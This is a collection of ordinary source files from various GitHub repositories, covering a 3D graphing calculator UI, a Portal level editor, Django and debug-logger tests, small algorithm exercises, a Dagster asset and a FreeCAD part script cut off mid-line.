data.equationBoxSize[1]*boxFactor\r\n if event.keysym==\"Up\":\r\n if data.listScroll<0:\r\n data.listScroll += data.listScrollSpeed\r\n elif event.keysym==\"Down\":\r\n if data.equationBoxSize[1]+(len(graphList)+1)*boxHeight+data.listScroll>=data.height:\r\n data.listScroll -= data.listScrollSpeed\r\n\r\ndef keyPressed3DInput(event, data):\r\n if data.mode==\"function3DInput\":\r\n allowedKeysym = \"1234567890xyzep\"\r\n elif data.mode==\"parametric3D2PInput\":\r\n allowedKeysym = \"1234567890xyztuep\"\r\n elif data.mode==\"parametric3D1PInput\":\r\n allowedKeysym = \"1234567890xyztep\"\r\n \r\n if event.keysym in allowedKeysym or event.char in data.extraKeys or event.keysym==\"Return\":\r\n if event.keysym==\"p\":\r\n data.inputs.insert(data.cursorListPosition, \"π\")\r\n elif event.keysym==\"Return\":\r\n data.inputs.insert(data.cursorListPosition, \"\\n\")\r\n else:\r\n data.inputs.insert(data.cursorListPosition, event.char)\r\n data.cursorListPosition += 1\r\n elif event.keysym==\"BackSpace\":\r\n if data.cursorListPosition>0:\r\n data.inputs.pop(data.cursorListPosition-1)\r\n data.cursorListPosition -= 1\r\n elif event.keysym==\"Left\":\r\n if data.cursorListPosition>0:\r\n data.cursorListPosition -= 1\r\n elif event.keysym==\"Right\":\r\n if data.cursorListPosition=boxHeight/boxFactor:\r\n whichFunction = int((event.y-boxHeight/boxFactor-data.listScroll)/boxHeight)\r\n if whichFunction==len(graphList):\r\n data.modifyIndex = \"new\"\r\n data.mode = inputMode\r\n elif whichFunction=topLeft[0] and event.y>=topLeft[1]:\r\n col = int((event.x-topLeft[0])/buttonWidth)\r\n row = int((event.y-topLeft[1])/buttonHeight)\r\n if (row,col) == (0,0):\r\n if data.keyboardMode==\"trig\":\r\n data.keyboardMode = \"inv\"\r\n else:\r\n data.keyboardMode = \"trig\"\r\n elif keyMask[row][col]==1:\r\n data.inputs.insert(data.cursorListPosition, keys[row][col])\r\n data.cursorListPosition += 1\r\n getCursorPosition(data)\r\n\r\n################################################################################\r\n## DRAW\r\n################################################################################\r\n\r\ndef drawOptions3DMode(canvas, data):\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draws other boxes\r\n boxWidth, boxHeight = data.options3DBoxSize[0], data.options3DBoxSize[1]\r\n canvas.create_rectangle((data.width/2-boxWidth/2,boxHeight),\\\r\n (data.width/2+boxWidth/2,2*boxHeight), width=1)\r\n canvas.create_text((data.width/2,3*boxHeight/2),\\\r\n text=\"Functions\", font=\"Arial \"+str(int(boxHeight/4)))\r\n \r\n canvas.create_rectangle((data.width/2-boxWidth/2,2*boxHeight),\\\r\n (data.width/2+boxWidth/2,3*boxHeight), width=1)\r\n canvas.create_text((data.width/2,5*boxHeight/2),\\\r\n text=\"Parametric (2 Parameters)\", font=\"Arial \"+str(int(boxHeight/4)))\r\n \r\n canvas.create_rectangle((data.width/2-boxWidth/2,3*boxHeight),\\\r\n (data.width/2+boxWidth/2,4*boxHeight), width=1)\r\n canvas.create_text((data.width/2,7*boxHeight/2),\\\r\n text=\"Parametric (1 Parameter)\", font=\"Arial \"+str(int(boxHeight/4)))\r\n\r\n\r\ndef draw3DList(canvas, data):\r\n if data.mode==\"function3DList\":\r\n graphList = data.graphsFunction3D\r\n boxFactor = 1\r\n elif data.mode==\"parametric3D2PList\":\r\n graphList = data.graphsParametric3D2P\r\n boxFactor = 2\r\n elif data.mode==\"parametric3D1PList\": \r\n graphList = data.graphsParametric3D1P\r\n boxFactor = 2\r\n # draws every 3D function\r\n boxWidth, boxHeight = data.equationBoxSize[0], data.equationBoxSize[1]*boxFactor\r\n margin = data.width/20\r\n for i in range(len(graphList)+1):\r\n canvas.create_rectangle((0,boxHeight*i+data.equationBoxSize[1]+data.listScroll),\\\r\n (boxWidth,boxHeight*(i+1)+data.equationBoxSize[1]+data.listScroll), width=1)\r\n # add function\r\n if i==len(graphList):\r\n canvas.create_text((data.width/2,boxHeight*(i+0.5)+data.equationBoxSize[1]+data.listScroll),\\\r\n text=\"+\", fill=\"lime green\", font=\"Arial \"+str(int(boxHeight/2/boxFactor)))\r\n # existing functions\r\n else:\r\n canvas.create_text((margin,boxHeight*(i+0.5)+data.equationBoxSize[1]+data.listScroll),\\\r\n anchor=\"w\", text=formEquationString(graphList[i].display),\\\r\n font=\"Courier \"+str(int(boxHeight/5/boxFactor)))\r\n canvas.create_rectangle((0,0), (data.width,data.equationBoxSize[1]), width=0, fill=\"white\")\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n\r\n\r\ndef draw3DInput(canvas, data):\r\n if data.mode==\"function3DInput\":\r\n keyMask = data.function3DKeyMask\r\n elif data.mode==\"parametric3D2PInput\":\r\n keyMask = data.parametric3D2PKeyMask\r\n elif data.mode==\"parametric3D1PInput\": \r\n keyMask = data.parametric3D1PKeyMask\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draw Go box\r\n canvas.create_rectangle((data.width-boxWidth,0), (data.width,boxHeight), width=1)\r\n canvas.create_text((data.width-boxWidth/2,boxHeight/2), text=\"Go\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draw Delete box\r\n if data.modifyIndex != \"new\":\r\n canvas.create_rectangle((data.width-2*boxWidth,0), (data.width-boxWidth,boxHeight), width=1)\r\n canvas.create_text((data.width-3*boxWidth/2,boxHeight/2), fill=\"red\", text=\"Delete\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n \r\n if data.keyboardMode==\"trig\":\r\n keys = data.calcKeyboardTrig\r\n else:\r\n keys = data.calcKeyboardInv\r\n numCols = len(keys[0])\r\n numRows = len(keys)\r\n buttonWidth = data.width/numCols\r\n buttonHeight = buttonWidth*2/3\r\n topLeft = [0, data.height-numRows*buttonHeight]\r\n for row in range(numRows):\r\n for col in range(numCols):\r\n if keyMask[row][col]==1:\r\n boxColor = \"white\"\r\n textColor = \"black\"\r\n else:\r\n boxColor = \"gray70\"\r\n textColor = \"gray30\"\r\n canvas.create_rectangle((topLeft[0]+col*buttonWidth,topLeft[1]+row*buttonHeight),\\\r\n (topLeft[0]+(col+1)*buttonWidth,topLeft[1]+(row+1)*buttonHeight), width=1, fill=boxColor)\r\n canvas.create_text((topLeft[0]+(col+0.5)*buttonWidth,topLeft[1]+(row+0.5)*buttonHeight),\\\r\n text=keys[row][col], fill=textColor, font=\"Courier \"+str(int(buttonHeight/3)))\r\n margin = data.width/20\r\n canvas.create_text((margin,data.height/3), anchor=\"w\", text=formEquationString(data.inputs),\\\r\n font=\"Courier \"+str(int(buttonHeight/2)))\r\n textHeight = data.textHeight\r\n textWidth = data.textWidth\r\n canvas.create_line((margin+data.cursorPosition[0],data.height/3+data.cursorPosition[1]-textHeight/2),\\\r\n (margin+data.cursorPosition[0],data.height/3+data.cursorPosition[1]+textHeight/2), width=1)\r\n","repo_name":"axu682/3D-Graphing-Calculator","sub_path":"InputModes.py","file_name":"InputModes.py","file_ext":"py","file_size_in_byte":14435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33704547375","text":"from portal import colors\nfrom portal.geometry import Position\nfrom portal.wall import Wall, PortalWall, Ledge, Door, Grill\nfrom portal.entity import Portal, Cube, Button\n\nclass Tool:\n def __init__(self, canvas, level):\n self.canvas = canvas\n self.level = level\n self.setup()\n\n def setup(self):\n pass\n\n def mousedown(self, x, y):\n pass\n\n def mousemove(self, x, y):\n pass\n\n def mouseup(self, x, y):\n pass\n\nclass PlayerTool(Tool):\n name = 'Place player'\n def mousedown(self, x, y):\n p = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.start.move_to(p)\n self.level.player.move_to(p)\n self.canvas.redraw()\n\nclass GoalTool(Tool):\n name = 'Place goal'\n def mousedown(self, x, y):\n p = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.goal.move_to(p)\n self.canvas.redraw()\n\n\nclass SegmentTool(Tool):\n def setup(self):\n self.pos1 = None\n\n def mousedown(self, x, y):\n self.pos1 = Position(round(x), round(y))\n\n def mousemove(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(round(x), round(y))\n self.canvas.redraw()\n if self.pos1.pos() != pos2.pos():\n segment = self._make_segment(self.pos1, pos2)\n segment.draw(self.canvas)\n\n def mouseup(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(round(x), round(y))\n if self.pos1.pos() != pos2.pos():\n segment = self._make_segment(self.pos1, pos2)\n self.level.walls.append(segment)\n self.canvas.redraw()\n self.pos1 = None\n\n def _closest_position(self, x, y):\n if abs(x - self.pos1.x) > abs(y - self.pos1.y):\n return Position(x, self.pos1.y)\n else:\n return Position(self.pos1.x, y)\n\n def _make_segment(self, pos1, pos2):\n raise NotImplementedError\n\nclass WallTool(SegmentTool):\n name = 'Wall'\n def _make_segment(self, pos1, pos2):\n return Wall(pos1, pos2)\n\nclass PortalWallTool(SegmentTool):\n name = 'Portalable wall'\n def _make_segment(self, pos1, pos2):\n return PortalWall(pos1, pos2)\n\nclass LedgeTool(SegmentTool):\n name = 'Ledge'\n def _make_segment(self, pos1, pos2):\n return Ledge(pos1, pos2)\n\nclass DoorTool(SegmentTool):\n name = 'Door'\n def _make_segment(self, pos1, pos2):\n return Door(pos1, pos2, [])\n\nclass GrillTool(SegmentTool):\n name = 'Grill'\n def _make_segment(self, pos1, pos2):\n return Grill(pos1, pos2)\n\nclass PortalTool(Tool):\n def setup(self):\n self.pos1 = None\n\n def mousedown(self, x, y):\n self.pos1 = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n\n def mousemove(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(x, y)\n self.canvas.redraw()\n if self.pos1.pos() != pos2.pos():\n portal = self._make_portal(self.pos1, pos2)\n portal.draw(self.canvas)\n\n def mouseup(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(x, y)\n if self.pos1.pos() != pos2.pos():\n portal = self._make_portal(self.pos1, pos2)\n self.level.add_entity(portal)\n self.canvas.redraw()\n self.pos1 = None\n\n def _closest_position(self, x, y):\n x = round(x * 2) * 0.5\n y = round(y * 2) * 0.5\n if x == self.pos1.x and y == self.pos1.y:\n return Position(x, y)\n if abs(x - self.pos1.x) > abs(y - self.pos1.y):\n if x > self.pos1.x:\n return Position(self.pos1.x + 1, self.pos1.y)\n else:\n return Position(self.pos1.x - 1, self.pos1.y)\n else:\n if y > self.pos1.y:\n return Position(self.pos1.x, self.pos1.y + 1)\n else:\n return Position(self.pos1.x, self.pos1.y - 1)\n\n def _make_portal(self, pos1, pos2):\n raise NotImplementedError\n\nclass Portal1Tool(PortalTool):\n name = 'Orange portal'\n def _make_portal(self, pos1, pos2):\n return Portal(pos1, pos2, 'portal1')\n\nclass Portal2Tool(PortalTool):\n name = 'Blue portal'\n def _make_portal(self, pos1, pos2):\n return Portal(pos1, pos2, 'portal2')\n\nclass CubeTool(Tool):\n name = 'Cube'\n def mousedown(self, x, y):\n cube = Cube(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.add_entity(cube)\n self.canvas.redraw()\n\nclass ButtonTool(Tool):\n name = 'Button'\n def mousedown(self, x, y):\n button = Button(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.add_entity(button)\n self.canvas.redraw()\n\nclass TriggerTool(Tool):\n name = 'Connect door to button'\n def setup(self):\n self.door = None\n self.button = None\n\n def mousedown(self, x, y):\n door = self._get_door(x, y)\n button = self._get_button(x, y)\n if door and button:\n if door.center().distance(Position(x, y)) < button.distance(Position(x, y)):\n self.door = door\n else:\n self.button = button\n elif door:\n self.door = door\n elif button:\n self.button = button\n\n def mousemove(self, x, y):\n if self.door:\n self.canvas.redraw()\n button = self._get_button(x, y)\n if button:\n self._draw_trigger(self.door.center(), button)\n else:\n self._draw_trigger(self.door.center(), Position(x, y))\n elif self.button:\n self.canvas.redraw()\n door = self._get_door(x, y)\n if door:\n self._draw_trigger(self.button, door.center())\n else:\n self._draw_trigger(self.button, Position(x, y))\n\n def mouseup(self, x, y):\n if self.door:\n button = self._get_button(x, y)\n if button and button not in self.door.triggers:\n self.door.triggers.append(button)\n elif self.button:\n door = self._get_door(x, y)\n if door and self.button not in door.triggers:\n door.triggers.append(self.button)\n self.door = None\n self.button = None\n self.canvas.redraw()\n\n def _draw_trigger(self, pos1, pos2):\n self.canvas.create_line(pos1.x, pos1.y, pos2.x, pos2.y,\n width=2.0,\n dash=(8, 8),\n fill=colors.TRIGGER)\n\n def _get_door(self, x, y):\n for wall in self.level.walls:\n if isinstance(wall, Door) and wall.center().distance(Position(x, y)) < 0.5:\n return wall\n\n def _get_button(self, x, y):\n for entity in self.level.entities:\n if isinstance(entity, Button) and entity.distance(Position(x, y)) < 0.5:\n return entity\n\nclass EraserTool(Tool):\n name = 'Eraser'\n def setup(self):\n self.last_x = None\n self.last_y = None\n\n def mousedown(self, x, y):\n self._remove_entities(x, y)\n self.canvas.redraw()\n self.last_x = x\n self.last_y = y\n\n def mousemove(self, x, y):\n if self.last_x is not None and self.last_y is not None:\n self._remove_entities(x, y)\n self._remove_walls(self.last_x, self.last_y, x, y)\n self.canvas.redraw()\n self.last_x = x\n self.lats_y = y\n\n def mouseup(self, x, y):\n self.last_x = None\n self.last_y = None\n\n def _remove_entities(self, x, y):\n to_remove = []\n for e in self.level.entities:\n if e.x is not None and e.y is not None and e.distance(Position(x, y)) < 0.2:\n to_remove.append(e)\n for e in to_remove:\n self.level.remove_entity(e)\n\n def _remove_walls(self, x1, y1, x2, y2):\n to_remove = []\n for wall in self.level.walls:\n if wall.intersects(Position(x1, y1), Position(x2, y2)):\n to_remove.append(wall)\n for wall in to_remove:\n self.level.walls.remove(wall)\n\n\n\nTOOLS = [\n PlayerTool,\n GoalTool,\n WallTool,\n PortalWallTool,\n LedgeTool,\n DoorTool,\n GrillTool,\n Portal1Tool,\n Portal2Tool,\n CubeTool,\n ButtonTool,\n TriggerTool,\n EraserTool,\n]\n","repo_name":"michaelelin/portal_planner","sub_path":"portal/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":8387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4262653398","text":"import glob\nimport inspect\nimport os.path\nimport pytest\nimport re\nimport shutil\n\nfrom publicprize import debug as ppd\nfrom publicprize import config\nfrom publicprize.debug import pp_t\n\n_request_logger = None\n\n_expect = {\n 'environ': 'some environ',\n 'status': 'some status',\n 'response_headers': 'some headers',\n 'response_data': 'some write',\n 'other': 'hello'\n}\n\ndef _init_debug(test_mode, regex):\n ppd._request_logger = None\n ppd._trace_printer = None\n ppd._app = None\n mock = MockApp()\n mock.config = {\n 'PUBLICPRIZE': {\n 'TRACE': regex,\n 'TEST_MODE': test_mode}}\n ppd.init(mock)\n return mock\n\nclass MockApp(object):\n \n def __init__(self):\n self.wsgi_app = self\n self.called__call__ = 0\n \n def __call__(self, environ, start_response):\n global _expect\n global _request_logger\n self.called__call__ += 1\n start_response(_expect['status'], _expect['response_headers'])\n return _expect['response_data']\n\ndef test_nothing():\n global _request_logger\n mock = _init_debug(0, None)\n assert mock.wsgi_app == mock\n \ndef test_log():\n global _expect\n global _request_logger\n if os.path.exists('debug'):\n shutil.rmtree('debug')\n os.mkdir('debug')\n called_start_response = 0\n mock = _init_debug(1, None)\n _request_logger = ppd.get_request_logger()\n def start_response(status, response_headers, exc_info=None):\n nonlocal called_start_response\n called_start_response += 1\n \n def assert_file(index, suffix):\n name = os.path.join('debug', index + '-' + suffix)\n assert os.path.exists(name), name\n with open(name, 'r') as f:\n actual = f.read()\n assert actual == _expect[suffix], suffix + '=' + actual\n\n response = mock.wsgi_app(_expect['environ'], start_response)\n assert '00000003-response_headers' in _request_logger.last_file_name()\n _request_logger.set_log_dir('new_dir')\n for ignore in response:\n pass\n assert '00000001-response_data' in _request_logger.last_file_name() \n response.close()\n _request_logger.log('hello', 'other')\n\n assert mock.called__call__ == 1\n assert called_start_response == 1\n assert_file('00000001', 'environ')\n assert_file('00000002', 'status')\n assert_file('00000003', 'response_headers')\n assert_file('new_dir/00000001', 'response_data')\n assert_file('new_dir/00000002', 'other')\n _request_logger.log('not written', 'invalid/suffix')\n assert list(glob.glob('debug/*invalid*')) == [], 'found invalid/suffix'\n\ndef test_trace():\n _last_msg = None\n def _init(regex):\n nonlocal _last_msg\n _last_msg = None\n _init_debug(0, regex)\n ppd._trace_printer.write = _write\n\n def _write(msg):\n nonlocal _last_msg\n _last_msg = msg\n\n def expect(msg):\n return './tests/test_debug.py:{}:test_trace {}\\n'.format(inspect.currentframe().f_back.f_lineno - 1, msg)\n\n _init(None)\n pp_t('hello')\n assert None == _last_msg\n\n _init('.')\n pp_t('hello')\n assert expect('hello') == _last_msg \n pp_t('x{}x', ['y'])\n assert expect('xyx') == _last_msg \n\n _init('goodbye')\n pp_t('hello')\n assert None == _last_msg \n pp_t('goodbye')\n assert expect('goodbye') == _last_msg \n \n","repo_name":"biviosoftware/publicprize","sub_path":"tests/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4045944195","text":"\"\"\"\nAquest mòdul serveix per descomprimir l'arxiu twitter_reduced.zip\n\"\"\"\n\nimport os\nimport glob\nimport zipfile\nimport csv\n\n\ndef decompress_data():\n \"\"\"\n Funció per descomprimir l'arxiu twitter_reduced.zip\n Return: twitter_reduced.csv\n \"\"\"\n\n # Definim el directori al arxiu per descomprimir\n zip_files = glob.glob('./data/twitter_reduced.zip')\n if zip_files:\n zip_file = zip_files[0]\n directory = os.path.dirname(zip_file)\n\n # Descomprimim l'arxiu i el guardem a la carpeta data\n with zipfile.ZipFile(zip_file, 'r') as z:\n z.extractall(directory)\n\n print(\"L'arxiu s'ha descomprimit i guardat a la carpeta data\")\n\n\ndef csv_to_list_dict(path_to_file):\n \"\"\"\n Funció per passar un csv a una llista de diccionaris.\n :param path_to_file: Arxiu csv com a input.\n :return: Llista de diccionaris.\n \"\"\"\n # Creem una llista buida\n list_dict = []\n\n # Obrim l'arxiu i el llegim\n with open(path_to_file, 'r', newline='', encoding='utf-8') as f:\n reader = csv.DictReader(f)\n\n # Iterem per cada línia, la passem a diccionari i l'afegim a la llista\n for row in reader:\n list_dict.append(dict(row))\n return list_dict\n","repo_name":"vtierz/pec4","sub_path":"dataset/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24451528309","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n# @Author : xuan\n中位数是一个可将数值集合划分为相等的上下两部分的一个数值。\n如果列表数据的个数是奇数,则列表中间那个数据就是列表数据的中位数;\n如果列表数据的个数是偶数,则列表中间那2个数据的算术平均值就是列表数据的中位数。\n在这个任务里,你将得到一个含有自然数的非空数组(X)。你必须把它分成上下两部分,找到中位数。\n\"\"\"\n\ndef checkio(data):\n new_data = sorted(data)\n if len(data) % 2 != 0:\n return new_data[int(len(data)/2)]\n else:\n return (new_data[len(data)//2 -1] + new_data[len(data)//2])/2\n\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio([1, 2, 3, 4, 5]) == 3, \"Sorted list\"\n assert checkio([3, 1, 2, 5, 3]) == 3, \"Not sorted list\"\n assert checkio([1, 300, 2, 200, 1]) == 2, \"It's not an average\"\n assert checkio([3, 6, 20, 99, 10, 15]) == 12.5, \"Even length\"\n print(\"Start the long test\")\n assert checkio(list(range(1000000))) == 499999.5, \"Long.\"\n print(\"The local tests are done.\")\n print(checkio([1, 2, 3, 4, 5, 6]))","repo_name":"kxeg/checkio","sub_path":"checkio/Median.py","file_name":"Median.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72598424488","text":"# Problem #1026\n# Author: Dalton Lima @daltonbr\n# 07/04/17\n# https://www.urionlinejudge.com.br/judge/en/problems/view/1026\n\nimport fileinput\n\nfor line in fileinput.input():\n #print(\"line read: \", line)\n value_list = line.split()\n\n # Converting str to int ... with list comprehension\n int_list = line.split()\n int_list = [int(i) for i in int_list]\n\n # ... or we could user map function also\n # int_list = list(map(int, int_list))\n\n # it's a simple bitwise xor (operator ^)\n print(int_list[0] ^ int_list[1])\n","repo_name":"daltonbr/problems","sub_path":"_URI/1026-ToCarryOrNotToCarry/carry.py","file_name":"carry.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6388199832","text":"# tests.py\n# from django.test import TestCase\nfrom django.urls import reverse\nimport pytest\nfrom pytest_django.asserts import assertTemplateUsed # assertQuerysetEqual\nfrom .models import MyUser, Note\n\n\n# Test on correct Routing page:\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_login_route(client):\n response = client.get(reverse(\"login\"))\n assert response.status_code == 200\n assertTemplateUsed(response, \"login.html\")\n assert b\"Register\" in response.content\n\n\n# Test on single Note for User:\n@pytest.mark.django_db\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_user_have_single_note(client):\n # Create a User in DB\n single_note_user = MyUser.objects.create(\n name=\"User1\", password=\"cryptography_staff_123\", language=\"Polish\", grade=\"Low\"\n )\n\n # Create the User Note in DB:\n new_note = Note.objects.create(\n user_note=single_note_user,\n title=\"Test Note\",\n msg=\"This is a test note\",\n assignee=\"Test User\",\n e_mail=\"Test_Email@ithillel.ua\",\n )\n\n # Access the user's notes page:\n response = client.get(reverse(\"user_info\", kwargs={\"username\": new_note.user_note}))\n assert response.status_code == 200\n assertTemplateUsed(response, \"admin_user_info.html\")\n\n # Check if the note is present in the response:\n assert new_note.title in response.content.decode()\n\n # We are on page: http://127.0.0.1:8000/users/John/\n # Only user info here and Note titles\n\n\n# Test on three Notes for User:\n@pytest.mark.django_db\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_user_have_3_notes(client):\n # Create a user in DB:\n multi_note_user = MyUser.objects.create(\n name=\"David\",\n password=\"cryptography_staff_321\",\n language=\"Esperanto\",\n grade=\"Medium\",\n )\n\n # Create a User Note1 in DB:\n new_note1 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Holiday Plans\",\n msg=\"Sunbathe on a beach\",\n assignee=\"Evan Tree\",\n e_mail=\"Test_Email1@ithillel.ua\",\n )\n\n # Create a User Note2 in DB:\n new_note2 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Morning Routine\",\n msg=\"Walk a Dog\",\n assignee=\"Chris Newdawn\",\n e_mail=\"Test_Email2@ithillel.ua\",\n )\n\n # Create a User Note3 in DB:\n new_note3 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Animal Care\",\n msg=\"Give Meds\",\n assignee=\"Samanta Hopper\",\n e_mail=\"Test_Email3@ithillel.ua\",\n )\n\n # Access the user's notes page (\"username\" is same for all 3):\n multi_response = client.get(\n reverse(\"user_info\", kwargs={\"username\": new_note1.user_note})\n )\n assert multi_response.status_code == 200\n assertTemplateUsed(multi_response, \"admin_user_info.html\")\n\n # Check if all 3 notes are present in the response:\n assert (\n new_note1.title and new_note2.title and new_note3.title\n ) in multi_response.content.decode()\n\n # We are on page: http://127.0.0.1:8000/users/David/\n # Only user info here and Note titles\n","repo_name":"Northman94/PyProZh","sub_path":"Lesson10/organizer10/scheduler/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"20030927569","text":"import numpy as np\nimport pandas as pd\nfrom computecost import computecost\nfrom computecost import sigmoid\ndef gradientDesent(X,y,alpha,num_iter):\n \"\"\"X为特征矩阵,y为标签数组,theta为角度,alpha为学习效率,num_iters为所迭代的次数,\n 此函数为梯度算法,返回最小角度和代价函数矩阵\"\"\"\n m, n = X.shape # 样本总量\n theta = np.zeros((n, 1))\n m=len(y)#样本总量\n theta=theta.reshape(-1,1)\n J_history=np.zeros((num_iter,1))#将代价函数矩阵初始为零矩阵\n for iter in range(num_iter):\n s=sigmoid(np.dot(X,theta))#调用sigmoid函数\n theta=theta-alpha*np.dot(X.T,(s-y))/m#梯度函数应用\n J_history[iter][0]=computecost(s,y)#调用代价函数,每次迭代的结果写入,更新矩阵值\n return theta,J_history\n","repo_name":"karagg/tt","sub_path":"logistic/gradientDesent.py","file_name":"gradientDesent.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9880575717","text":"import pandas as pd\n\nfrom dagster import MaterializeResult, MetadataValue, asset\n\n# start_add_signsup_asset\nfrom .resources import DataGeneratorResource\n\n# ...\n\n\n@asset\ndef signups(hackernews_api: DataGeneratorResource) -> MaterializeResult:\n signups = pd.DataFrame(hackernews_api.get_signups())\n\n signups.to_csv(\"data/signups.csv\")\n\n return MaterializeResult(\n metadata={\n \"Record Count\": len(signups),\n \"Preview\": MetadataValue.md(signups.head().to_markdown()),\n \"Earliest Signup\": signups[\"registered_at\"].min(),\n \"Latest Signup\": signups[\"registered_at\"].max(),\n }\n )\n\n\n# end_add_signsup_asset\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/tutorial/connecting/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"}
+{"seq_id":"70549139689","text":"from typing import Dict\n\n\nclass DisplaySegment(object):\n ON_STR_HORIZ = \"===\"\n OFF_STR_HORIZ = \"___\"\n ON_STR_VERT = \"B\"\n OFF_STR_VERT = \"|\"\n\n def __init__(self):\n self.anode = True # type: bool\n self.cathodes = {chr(c): False for c in range(ord('a'), ord('f') + 1)} # type: Dict[str: bool]\n self.cathodes[\"dp\"] = False\n\n def __repr__(self):\n r = \".%s.\\n%s...%s\\n%s...%s\\n.%s%s\" % \\\n (self.ON_STR_HORIZ if self.cathodes[\"a\"] else self.OFF_STR_HORIZ,\n self.ON_STR_VERT if self.cathodes[\"f\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"b\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"e\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"c\"] else self.OFF_STR_VERT,\n self.ON_STR_HORIZ if self.cathodes[\"a\"] else self.OFF_STR_HORIZ,\n \"*\" if self.cathodes[\"dp\"] else \".\")\n return r\n\n\nclass SevenSegmentDisplay(object):\n def __init__(self):\n self.segments = [DisplaySegment() for _ in range(0, 8)]\n","repo_name":"Vadman97/PicoSim","sub_path":"hardware_sim/seven_segment_display.py","file_name":"seven_segment_display.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"33172266248","text":"import supalib\n\nEPS = 0.01\nTOLE = 0.2\n\nBUMBER_STICK_SEPARATION = 30\nBUMBER_STICK_XSIZE = 10\nBUMBER_STICK_YSIZE = 10\nBUMBER_STICK_LEN = 120\n\nMOUNT_B_OFFSET = -70\nMOUNT_THICKNESS = 4\nMOUNT_YSIZE = 30\nMOUNT_STIC_SIZE = 2*MOUNT_THICKNESS + BUMBER_STICK_YSIZE\n\n\ndef crete_single_mount( with_hole ):\n raw = supalib.create_box( size=(MOUNT_STIC_SIZE , MOUNT_YSIZE , MOUNT_STIC_SIZE ), place = (0, 0, 0 ) )\n \n if with_hole == False:\n offset_y = -EPS\n else:\n offset_y = MOUNT_THICKNESS*0.5\n \n hole = supalib.create_box( size=( BUMBER_STICK_XSIZE + 2*TOLE, MOUNT_YSIZE + 2*EPS, BUMBER_STICK_YSIZE + 2*TOLE ), place = (MOUNT_THICKNESS - TOLE, offset_y, MOUNT_THICKNESS - TOLE) )\n return supalib.create_cut( raw, hole )\n\ndef create_base_mount():\n raw = supalib.create_box( place=(-BUMBER_STICK_SEPARATION - EPS, -EPS,-TOLE), size=( 2*BUMBER_STICK_SEPARATION + 2*EPS, MOUNT_YSIZE + 2*EPS, MOUNT_THICKNESS ) )\n BOLT_SEP = MOUNT_YSIZE/4.0\n hole1 = supalib.create_cyl( place=(0, MOUNT_YSIZE*0.5 + BOLT_SEP, -1.0), radius=1.5 + TOLE, size_z=10)\n hole2 = supalib.create_cyl( place=(0, MOUNT_YSIZE*0.5 - BOLT_SEP, -1.0), radius=1.5 + TOLE, size_z=10)\n holes = supalib.create_union( (hole1, hole2 ) )\n return supalib.create_cut( raw, holes )\n\n\ndef create_full_part( with_hole, label ):\n base = create_base_mount() \n mount_1 = crete_single_mount( with_hole )\n mount_2 = crete_single_mount( with_hole )\n supalib.relocate( mount_1, place=( 